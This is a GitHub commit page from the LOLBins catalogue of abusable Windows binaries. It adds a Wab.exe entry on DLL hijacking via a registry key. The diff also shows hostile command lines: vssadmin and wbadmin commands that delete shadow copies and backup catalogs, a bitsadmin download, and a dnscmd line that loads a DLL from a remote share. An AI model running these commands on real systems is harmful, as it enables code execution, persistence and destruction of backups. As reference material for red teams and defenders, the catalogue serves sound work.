Skip to content

Commit 118c337

Browse files
author
Oddvar Moe
committed
Cleaning and adding Wab.exe
1 parent 8b1e87b commit 118c337

File tree

7 files changed

+50
-67
lines changed

7 files changed

+50
-67
lines changed

Backlog.txt

+2-1
Original file line numberDiff line numberDiff line change
@@ -3,7 +3,6 @@ Kd.exe Debugger
33
Certreq.exe Exfiltrate data
44
Dbghost.exe
55
Robocopy.exe Needs examples
6-
Bitsadmin.exe bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
76
Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
87
notepad.exe Gui - Download files using Open (A lot of other programs as well) LOLGuiBins?
98
wbadmin.exe wbadmin delete catalog -quiet
@@ -15,3 +14,5 @@ WseClientSvc.exe - https://blog.huntresslabs.com/abusing-trusted-applications-a7
1514
dvdplay.exe http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/
1615
http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/
1716
https://twitter.com/Hexacorn/status/993498264497541120
17+
https://twitter.com/Hexacorn/status/994000792628719618
18+
https://github.com/MoooKitty/Code-Execution

LOLBins.md

+1-2
Original file line numberDiff line numberDiff line change
@@ -46,12 +46,10 @@ If you are missing from the acknowledgement, please let me know (I did not forge
4646
[Presentationhost.exe](OSBinaries/Presentationhost.md)
4747
[Print.exe](OSBinaries/Print.md)
4848
[Psr.exe](OSBinaries/Psr.md)
49-
[Qprocess.exe](OSBinaries/Qprocess.md)
5049
[Reg.exe](OSBinaries/Reg.md)
5150
[Regedit.exe](OSBinaries/Regedit.md)
5251
[Regasm.exe](OSBinaries/Regasm.md)
5352
[Register-cimprovider.exe](OSBinaries/Register-cimprovider.md)
54-
[Regini.exe](OSBinaries/Regini.md)
5553
[Regsvcs.exe](OSBinaries/Regsvcs.md)
5654
[Regsvr32.exe](OSBinaries/Regsvr32.md)
5755
[Replace.exe](OSBinaries/Replace.md)
@@ -63,6 +61,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
6361
[Sc.exe](OSBinaries/Sc.md)
6462
[Scriptrunner.exe](OSBinaries/Scriptrunner.md)
6563
[Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md)
64+
[Wab.exe](OSBinaries/Wab.md)
6665
[Wmic.exe](OSBinaries/Wmic.md)
6766
[Wscript.exe](OSBinaries/Wscript.md)
6867
[Xwizard.exe](OSBinaries/Xwizard.md)

OSBinaries/Dnscmd.md

+5-1
Original file line numberDiff line numberDiff line change
@@ -7,15 +7,19 @@ dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
77
```
88

99
Acknowledgements:
10-
* Dimitrios Slamaris - @dim0x69
10+
* Shay Ber - ?
11+
* Dimitrios Slamaris - @dim0x69
12+
* Nikhil SamratAshok Mittal - @nikhil_mitt
1113

1214
Code sample:
1315
*
1416

1517
Resources:
18+
* https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
1619
* https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
1720
* https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
1821
* https://twitter.com/Hexacorn/status/994000792628719618
22+
* http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
1923

2024
Full path:
2125
```

OSBinaries/Qprocess.md

-31
This file was deleted.

OSBinaries/Regini.md

-30
This file was deleted.

OSBinaries/Wab.md

+38
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,38 @@
1+
## Wab.exe
2+
3+
* Functions: Execute
4+
5+
```
6+
Wab.exe (requires registry changes)
7+
```
8+
9+
Acknowledgements:
10+
* Adam - @Hexacorn
11+
12+
Code sample:
13+
*
14+
15+
Resources:
16+
* http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
17+
* https://twitter.com/Hexacorn/status/991447379864932352
18+
19+
Full path:
20+
```
21+
C:\Program Files\Windows Mail\wab.exe
22+
C:\Program Files (x86)\Windows Mail\wab.exe
23+
```
24+
25+
Notes:
26+
Searches for wab.dll. Can be manipulated with the following registry key:
27+
```
28+
HKLM\Software\Microsoft\WAB\DLLPath
29+
```
30+
31+
Binary is used to manage Windows contacts/wab files. (Legacy)
32+
33+
34+
Detection:
35+
Look for registry changes to HKLM\Software\Microsoft\WAB\DLLPath
36+
37+
38+

OtherMSBinaries/Sqldumper.md

+4-2
Original file line numberDiff line numberDiff line change
@@ -21,11 +21,13 @@ Resources:
2121

2222
Full path:
2323
```
24-
C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
24+
C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
25+
26+
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
2527
```
2628

2729
Notes:
28-
30+
Part of SQL server, but also Office in some versions.
2931

3032

3133

0 commit comments

Comments
 (0)